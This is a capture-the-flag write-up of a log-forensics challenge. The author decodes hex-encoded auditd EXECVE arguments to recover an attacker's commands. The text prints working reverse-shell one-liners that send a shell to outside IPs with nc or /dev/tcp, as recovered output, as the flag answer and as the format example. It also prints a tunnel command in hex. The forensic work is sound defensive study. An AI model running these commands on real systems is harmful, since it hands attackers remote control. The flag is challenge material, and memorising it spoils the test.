FCSC : SOCrate - Reverse shell

Statement: In June 2023, an operator of vital importance falls victim to an attack that compromises its entire information system. You have received the Linux and Windows logs and must answer the investigators’ questions.

Note: The parts are numbered in the chronological order of the attack, but it is not necessary to solve them in order.

The attacker has executed a reverse shell on a machine. Find the command corresponding to the execution of this reverse shell.

Flag format: FCSC{COMMAND_LINE}

Example: FCSC{bash -i >& /dev/tcp/10.42.43.44/1234 0>&1}

I start by inspecting the linux logs and notice that they are auditd logs :

...
node=webserver type=SYSCALL msg=audit(1686754794.649:12018): arch=c000003e syscall=59 success=yes exit=0 a0=7fe4a00d84e0 a1=7fe4a005d230 a2=7fff070c9698 a3=7fe4c3518ac0 items=2 ppid=5871 pid=11778 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=4294967295 comm="bash" exe="/usr/bin/bash" subj=unconfined key="program_execution" ARCH=x86_64 SYSCALL=execve AUID="unset" UID="ubuntu" GID="ubuntu" EUID="ubuntu" SUID="ubuntu" FSUID="ubuntu" EGID="ubuntu" SGID="ubuntu" FSGID="ubuntu"
node=webserver type=EXECVE msg=audit(1686754794.649:12018): argc=3 a0="/bin/bash" a1="-c" a2=726D202F746D702F663B6D6B6669666F202F746D702F663B636174202F746D702F667C2F62696E2F7368202D6920323E26317C6E632038302E3132352E392E3538203530303131203E2F746D702F66
node=webserver type=CWD msg=audit(1686754794.649:12018): cwd="/var/www/app/banque_paouf"
...

The auditd logs are composed of the following elements, which will be of interest to me in finding the payload :

SYSCALL : system call triggered
EXECVE : arguments passed to a command
PROCTITLE : command line often encoded in hexadecimal

Rather than using the ausearch binary to parse auditd logs, I prefer to play with bash.

# cat linux/*.log | grep -i "execve" | grep "bash" | grep "argc"

...
node=webserver type=EXECVE msg=audit(1686907217.007:18745): argc=3 a0="/bin/bash" a1="-c" a2=7375646F202E2F7465787420636C69656E74202D762038302E3132352E392E35373A353030313220523A736F636B73
node=bastion type=EXECVE msg=audit(1686916694.736:7725): argc=1 a0="-bash"
node=ip-172-16-45-110 type=EXECVE msg=audit(1686916709.895:1891226): argc=1 a0="-bash"
node=ip-172-16-45-110 type=EXECVE msg=audit(1686916718.195:1891415): argc=3 a0="bash" a1="-c" a2=736370202D74202E
...

I see in my output that most of the a2 arguments correspond to a bash command encoded in hexadecimal.

So I’m working on the following oneliner to get all the arguments encoded and return the result in plain text :

# cat linux/*.log | grep -i "execve" | grep "/bin/bash" | grep "argc" | awk '{print $7}' | sed $'s/a2=/0a/g' | xxd -r -p | uniq

...
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50011 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.57 50012 >/tmp/f
...

Flag : FCSC{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50011 >/tmp/f}